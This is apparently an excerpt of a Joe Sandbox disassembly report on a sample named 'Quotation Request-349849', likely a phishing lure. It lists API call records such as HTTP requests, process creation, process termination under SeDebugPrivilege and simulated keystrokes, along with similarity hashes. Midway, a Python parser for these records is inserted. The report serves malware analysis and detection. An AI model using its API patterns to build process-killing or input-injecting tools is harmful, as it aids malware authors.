                                                      • OleUninitialize.OLE32(?,00000000), ref: 007DFB45
                                                      • UnregisterHotKey.USER32(?), ref: 007DFC9C
                                                      • DestroyWindow.USER32(?), ref: 008145D6
                                                      • FreeLibrary.KERNEL32(?), ref: 0081463B
                                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00814668
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                      • String ID: close all
                                                      • API String ID: 469580280-3243417748
                                                      • Opcode ID: 498f93752a6401279f57661f8eaf21117c113bcd16f458552891b1a68308b246
                                                      • Instruction ID: 4359d4a766e21994ecfb225798cb1992dd9fc55d479c4fcf4060f1ce62822b6d
                                                      • Opcode Fuzzy Hash: 498f93752a6401279f57661f8eaf21117c113bcd16f458552891b1a68308b246
                                                      • Instruction Fuzzy Hash: 06A16B30301216CFDB18EF14C599AA9F364FF15714F1442AEE90AAB362DB34AC56CF90
                                                      APIs
                                                      • EnumChildWindows.USER32(?,0082A439), ref: 0082A377
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: ChildEnumWindows
                                                      • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                      • API String ID: 3555792229-1603158881
                                                      • Opcode ID: de551adf051c2204c01cb524a236abf1fd145e67db29489cbacd50eaa02221a2
                                                      • Instruction ID: 261816e404eb0d7b8f442b5b0651c50778395a500935ac2dad75c042858ebb09
                                                      • Opcode Fuzzy Hash: de551adf051c2204c01cb524a236abf1fd145e67db29489cbacd50eaa02221a2
                                                      • Instruction Fuzzy Hash: 69919F31600619EBCB0CEFA0D845BEEFB75FF04304F548119E95AE7241DB35A999CB91
                                                      APIs
                                                      • SetWindowLongW.USER32(?,000000EB), ref: 007D2EAE
                                                        • Part of subcall function 007D1DB3: GetClientRect.USER32(?,?), ref: 007D1DDC
                                                        • Part of subcall function 007D1DB3: GetWindowRect.USER32(?,?), ref: 007D1E1D
                                                        • Part of subcall function 007D1DB3: ScreenToClient.USER32(?,?), ref: 007D1E45
                                                      • GetDC.USER32 ref: 0080CD32
                                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0080CD45
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0080CD53
                                                      • SelectObject.GDI32(00000000,00000000), ref: 0080CD68
                                                      • ReleaseDC.USER32(?,00000000), ref: 0080CD70
                                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0080CDFB
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                      • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                      • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                      • String ID: U
                                                      • API String ID: 4009187628-3372436214
                                                      • Opcode ID: 8b3c33418e64b3457fb6b9f0c12db9baa9892ec116ca1d43733cf3e4709646de
                                                      • Instruction ID: 3de9b03be62dd32de410546eab826f526bbef0a54491a821b6ef2c61f589ccae
                                                      • Opcode Fuzzy Hash: 8b3c33418e64b3457fb6b9f0c12db9baa9892ec116ca1d43733cf3e4709646de
                                                      • Instruction Fuzzy Hash: D571D031500209EFCF619F64CC88AAA7FB5FF58325F18437AED559A2A6D7348C42DB60
                                                      APIs
                                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00841A50
                                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00841A7C
                                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00841ABE
                                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00841AD3
                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00841AE0
                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00841B10
                                                      • InternetCloseHandle.WININET(00000000), ref: 00841B57
                                                        • Part of subcall function 00842483: GetLastError.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 00842498
                                                        • Part of subcall function 00842483: SetEvent.KERNEL32(?,?,00841817,00000000,00000000,00000001), ref: 008424AD
                                                      Similarity
                                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                      • String ID:
                                                      • API String ID: 2603140658-3916222277
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0085F910), ref: 00848D28
                                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0085F910), ref: 00848D5C
                                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00848ED6
                                                      • SysFreeString.OLEAUT32(?), ref: 00848F00
                                                      Similarity
                                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                      • String ID:
                                                      • API String ID: 560350794-0
                                                      APIs
                                                      • _memset.LIBCMT ref: 0084F6B5
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084F848
                                                      • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0084F86C
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084F8AC
                                                      • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0084F8CE
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0084FA4A
                                                      • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0084FA7C
                                                      • CloseHandle.KERNEL32(?), ref: 0084FAAB
                                                      • CloseHandle.KERNEL32(?), ref: 0084FB22
                                                      Similarity
                                                      • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                      • String ID:
                                                      • API String ID: 4090791747-0
                                                      APIs
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00833697,?), ref: 0083468B
                                                        • Part of subcall function 0083466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00833697,?), ref: 008346A4
                                                        • Part of subcall function 00834A31: GetFileAttributesW.KERNEL32(?,0083370B), ref: 00834A32
                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00834D40
                                                      • _wcscmp.LIBCMT ref: 00834D5A
                                                      • MoveFileW.KERNEL32(?,?), ref: 00834D75
                                                      Similarity
                                                      • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                      • String ID:
                                                      • API String ID: 793581249-0
                                                      APIs
                                                      • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 008586FF
                                                      Similarity
                                                      • API ID: InvalidateRect
                                                      • String ID:
                                                      • API String ID: 634782764-0
                                                      APIs
                                                      • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0080C2F7
                                                      • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0080C319
                                                      • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0080C331
                                                      • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0080C34F
                                                      • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0080C370
                                                      • DestroyIcon.USER32(00000000), ref: 0080C37F
                                                      • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0080C39C
                                                      • DestroyIcon.USER32(?), ref: 0080C3AB
                                                        • Part of subcall function 0085A4AF: DeleteObject.GDI32(00000000), ref: 0085A4E8
                                                      Similarity
                                                      • API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
                                                      • String ID:
                                                      • API String ID: 2819616528-0
                                                      APIs
                                                        • Part of subcall function 0082A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0082A84C
                                                        • Part of subcall function 0082A82C: GetCurrentThreadId.KERNEL32 ref: 0082A853
                                                        • Part of subcall function 0082A82C: AttachThreadInput.USER32(00000000,?,00829683,?,00000001), ref: 0082A85A
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 0082968E
                                                      • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 008296AB
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 008296AE
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008296B7
                                                      • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 008296D5
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008296D8
                                                      • MapVirtualKeyW.USER32(00000025,00000000), ref: 008296E1
                                                      • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 008296F8
                                                      • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 008296FB
                                                      Similarity
                                                      • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                      • String ID:
                                                      • API String ID: 2014098862-0
                                                      APIs
                                                      • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0082853C,00000B00,?,?), ref: 0082892A
                                                      • HeapAlloc.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 00828931
                                                      • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0082853C,00000B00,?,?), ref: 00828946
                                                      • GetCurrentProcess.KERNEL32(?,00000000,?,0082853C,00000B00,?,?), ref: 0082894E
                                                      • DuplicateHandle.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 00828951
                                                      • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0082853C,00000B00,?,?), ref: 00828961
                                                      • GetCurrentProcess.KERNEL32(0082853C,00000000,?,0082853C,00000B00,?,?), ref: 00828969
                                                      • DuplicateHandle.KERNEL32(00000000,?,0082853C,00000B00,?,?), ref: 0082896C
                                                      • CreateThread.KERNEL32(00000000,00000000,00828992,00000000,00000000,00000000), ref: 00828986
                                                      Similarity
                                                      • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                      • String ID:
                                                      • API String ID: 1957940570-0
                                                      Similarity
                                                      • API ID:
                                                      • String ID: NULL Pointer assignment$Not an Object type
                                                      • API String ID: 0-572801152
                                                      Similarity
                                                      • API ID: Variant$ClearInit$_memset
                                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                      • API String ID: 2862541840-625585964
                                                      APIs
                                                        • Part of subcall function 0082710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?,?,00827455), ref: 00827127
                                                        • Part of subcall function 0082710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827142
                                                        • Part of subcall function 0082710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?,?), ref: 00827150
                                                        • Part of subcall function 0082710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00827044,80070057,?), ref: 00827160
                                                      • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00849806
                                                      • _memset.LIBCMT ref: 00849813
                                                      • _memset.LIBCMT ref: 00849956
                                                      • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00849982
                                                      • CoTaskMemFree.OLE32(?), ref: 0084998D
                                                      Strings
                                                      • NULL Pointer assignment, xrefs: 008499DB
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                      • String ID: NULL Pointer assignment
                                                      • API String ID: 1300414916-2785691316
                                                      • Opcode ID: 4250440a84dfa549473bee1884ec18ff176ba8bc34e0c8d53f68daa3746f5576
                                                      • Instruction ID: e4dac816febbc885156ce53254c5d5f4ee3e2b02f595aad08d5b1502571708d2
                                                      • Opcode Fuzzy Hash: 4250440a84dfa549473bee1884ec18ff176ba8bc34e0c8d53f68daa3746f5576
                                                      • Instruction Fuzzy Hash: 97912671D0022DEBDB20DFA5DC45ADEBBB9FF08310F10416AE519A7281EB359A44CFA0
                                                      APIs
                                                      • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00856E24
                                                      • SendMessageW.USER32(?,00001036,00000000,?), ref: 00856E38
                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00856E52
                                                      • _wcscat.LIBCMT ref: 00856EAD
                                                      • SendMessageW.USER32(?,00001057,00000000,?), ref: 00856EC4
                                                      • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00856EF2
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window_wcscat
                                                      • String ID: SysListView32
                                                      • API String ID: 307300125-78025650
                                                      • Opcode ID: c9657129040e1069c4105e0e127409b7591ac86843225378e56fdd553f4164c4
                                                      • Instruction ID: a0dceb88cfead64461c3a94676f3e05df7fbd3c9f2c966a9ec0c9d0a3df6f855
                                                      • Opcode Fuzzy Hash: c9657129040e1069c4105e0e127409b7591ac86843225378e56fdd553f4164c4
                                                      • Instruction Fuzzy Hash: E041A470A00348ABDB219FA4CC85BEE77F9FF08351F50046AFA54D7291E6769D98CB60
                                                      APIs
                                                        • Part of subcall function 00833C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00833C7A
                                                        • Part of subcall function 00833C55: Process32FirstW.KERNEL32(00000000,?), ref: 00833C88
                                                        • Part of subcall function 00833C55: CloseHandle.KERNEL32(00000000), ref: 00833D52
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084E9A4
                                                      • GetLastError.KERNEL32 ref: 0084E9B7
                                                      • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084E9E6
                                                      • TerminateProcess.KERNEL32(00000000,00000000), ref: 0084EA63
                                                      • GetLastError.KERNEL32(00000000), ref: 0084EA6E
                                                      • CloseHandle.KERNEL32(00000000), ref: 0084EAA3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                      • String ID: SeDebugPrivilege
                                                      • API String ID: 2533919879-2896544425
                                                      • Opcode ID: 3570fbf6a3bd9a3283e4c85f2940b6383aedb6135caa419bae8ea2fede493301
                                                      • Instruction ID: e99a72d3c6d10014ff66a05b674787dea9e548a3004dd461bf8a73141d46cfd2
                                                      • Opcode Fuzzy Hash: 3570fbf6a3bd9a3283e4c85f2940b6383aedb6135caa419bae8ea2fede493301
                                                      • Instruction Fuzzy Hash: 3141A9302002149FDB11EF28CCA9F6EBBA5FF54714F048459FA029B3D2DB78A844CB92
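Every function record in this section has the same shape: an APIs list of call sites (entries marked "Part of subcall function" are calls that sit in a callee), an optional Strings list with xrefs, the Memory Dump Source lines, the IDA plugin snapshot name, and a Similarity block (API ID, String ID, API String ID) followed by the Opcode and Instruction IDs and fuzzy hashes. The Python below is an added example, not code from the Joe Sandbox report or its IDA plugin: it parses records of that shape into dataclasses and adds the two pivots an analyst usually wants from this listing, namely which records call a given API (directly, or only through a callee) and which records share an API String ID. The sample input is constructed from two records on this page (the process-termination routine, abridged to seven API lines, and the LoadIconW routine); the parser assumes the layout shown here and treats the "Download File" label that the HTML export fuses onto .sdmp names as link residue to strip.

```python
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Constructed sample: two records from this section (the process-termination
# routine, abridged, and the LoadIconW routine) with the leading indentation removed.
SAMPLE_RECORDS = """\
APIs
  • Part of subcall function 00833C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00833C7A
  • Part of subcall function 00833C55: Process32FirstW.KERNEL32(00000000,?), ref: 00833C88
  • Part of subcall function 00833C55: CloseHandle.KERNEL32(00000000), ref: 00833D52
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 0084E9A4
• GetLastError.KERNEL32 ref: 0084E9B7
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0084EA63
• CloseHandle.KERNEL32(00000000), ref: 0084EAA3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
Similarity
• API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
• String ID: SeDebugPrivilege
• API String ID: 2533919879-2896544425
APIs
• LoadIconW.USER32(00000000,00007F03), ref: 00833033
Similarity
• API ID: IconLoad
• String ID: blank$info$question$stop$warning
• API String ID: 2457776203-404129466
• Instruction Fuzzy Hash: A7110831248B4AFAEB289B54DC96C6B679CFF55324F60002AFA10E6282DB685F4056E4
"""

SECTION_HEADERS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}
LINK_RESIDUE = "Download File"  # link label the HTML export fuses onto .sdmp names
API_RE = re.compile(
    r"^(?:Part of subcall function (?P<caller>[0-9A-Fa-f]+): )?"
    r"(?P<name>[\w#@?$.:]+?)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,? ref: (?P<ref>[0-9A-Fa-f]+)$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: List[str]
    ref: str                   # call-site address
    subcall_of: Optional[str]  # callee address for "Part of subcall function" entries

@dataclass
class FunctionRecord:
    apis: List[ApiCall] = field(default_factory=list)
    strings: List[Dict[str, object]] = field(default_factory=list)
    memory_sources: List[str] = field(default_factory=list)
    meta: Dict[str, str] = field(default_factory=dict)  # Snapshot File, API ID, String ID, hashes

def parse_records(text: str) -> List[FunctionRecord]:
    records, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line in SECTION_HEADERS:
            if line == "APIs":           # every record opens with its API list
                records.append(FunctionRecord())
            section = line
            continue
        if not records:
            continue                      # text before the first record
        rec, body = records[-1], line.lstrip("•").strip()
        if section == "APIs":
            m = API_RE.match(body)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                rec.apis.append(ApiCall(m["name"], m["module"], args, m["ref"], m["caller"]))
        elif section == "Strings":
            value, _, xrefs = body.partition(", xrefs: ")
            rec.strings.append({"value": value, "xrefs": xrefs.split(", ") if xrefs else []})
        elif section == "Memory Dump Source":
            if body.endswith(LINK_RESIDUE):
                body = body[: -len(LINK_RESIDUE)].rstrip()
            rec.memory_sources.append(body)
        else:  # "Joe Sandbox IDA Plugin" and "Similarity", incl. the ID/hash lines after it
            key, _, value = body.partition(":")
            rec.meta[key.strip()] = value.strip()
    return records

def functions_calling(records, api_name, include_subcalls=True):
    """Records whose API list contains api_name; optionally only direct call sites."""
    return [r for r in records if any(
        a.name == api_name and (include_subcalls or a.subcall_of is None) for a in r.apis)]

def by_api_string_id(records):
    """Group records by 'API String ID', the value to pivot on across reports."""
    idx: Dict[str, List[FunctionRecord]] = {}
    for r in records:
        if r.meta.get("API String ID"):
            idx.setdefault(r.meta["API String ID"], []).append(r)
    return idx
```

Feed `parse_records` the text of the whole function listing; `functions_calling(records, "TerminateProcess", include_subcalls=False)` then isolates routines that kill processes themselves rather than via a helper, and `by_api_string_id` groups records that match on the same API/string combination so the same value can be searched in other reports. The tokenisation behind "API ID" is not documented on this page, so the parser stores it verbatim rather than trying to recompute it.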
                                                      APIs
                                                      • LoadIconW.USER32(00000000,00007F03), ref: 00833033
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: IconLoad
                                                      • String ID: blank$info$question$stop$warning
                                                      • API String ID: 2457776203-404129466
                                                      • Opcode ID: 35b07f952a68a89ca90cc5d737406f7a2500a13055504a818b558eff135497c0
                                                      • Instruction ID: 5c036c511b16a1882994b1170fd997c067dbbca0c30125bb5bbe44b0706ae081
                                                      • Opcode Fuzzy Hash: 35b07f952a68a89ca90cc5d737406f7a2500a13055504a818b558eff135497c0
                                                      • Instruction Fuzzy Hash: A7110831248B4AFAEB289B54DC96C6B679CFF55324F60002AFA10E6282DB685F4056E4
                                                      APIs
                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00834312
                                                      • LoadStringW.USER32(00000000), ref: 00834319
                                                      • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0083432F
                                                      • LoadStringW.USER32(00000000), ref: 00834336
                                                      • _wprintf.LIBCMT ref: 0083435C
                                                      • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0083437A
                                                      Strings
                                                      • %s (%d) : ==> %s: %s %s, xrefs: 00834357
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: HandleLoadModuleString$Message_wprintf
                                                      • String ID: %s (%d) : ==> %s: %s %s
                                                      • API String ID: 3648134473-3128320259
                                                      • Opcode ID: 523517b328a8e888c1ecc346f21b7cffbfb9f4180fa78859167d28992b927444
                                                      • Instruction ID: aadc1ff02ae0f92a012c0dc8d091833b6d509d965a5b4df0c7441ae74babc5a5
                                                      • Opcode Fuzzy Hash: 523517b328a8e888c1ecc346f21b7cffbfb9f4180fa78859167d28992b927444
                                                      • Instruction Fuzzy Hash: 0C014FF2940308BFE711A7A0DD89EEB776CFB08302F4005A1BB45E2152EA786E854B70
                                                      APIs
                                                        • Part of subcall function 007D2612: GetWindowLongW.USER32(?,000000EB), ref: 007D2623
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0085D47C
                                                      • GetSystemMetrics.USER32(0000000F), ref: 0085D49C
                                                      • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0085D6D7
                                                      • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0085D6F5
                                                      • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0085D716
                                                      • ShowWindow.USER32(00000003,00000000), ref: 0085D735
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 0085D75A
                                                      • DefDlgProcW.USER32(?,00000005,?,?), ref: 0085D77D
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1333572403.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                       • Associated: 00000000.00000002.1333554701.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.000000000085F000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333632536.0000000000884000.00000002.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333689758.000000000088E000.00000004.00000001.01000000.00000003.sdmp
                                                       • Associated: 00000000.00000002.1333709098.0000000000897000.00000002.00000001.01000000.00000003.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_7d0000_Quotation Request-349849.jbxd
                                                      Similarity
                                                      • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                      • String ID:
                                                      • API String ID: 1211466189-0
                                                      • Opcode ID: 78b169f3cecbf84670d657911e43a92921e81f531f11bc8fc5ee82b30d32cf62
                                                      • Instruction ID: 9cbc63e3ee634d10343fa9bda4641ebfbb33debf2398081c123ef432ab58aeeb
                                                      • Opcode Fuzzy Hash: 78b169f3cecbf84670d657911e43a92921e81f531f11bc8fc5ee82b30d32cf62
                                                      • Instruction Fuzzy Hash: 01B16975600219EFDF24CF68C9857AA7BF1FF08712F088069ED48DA295E734A959CB90
                                                      APIs
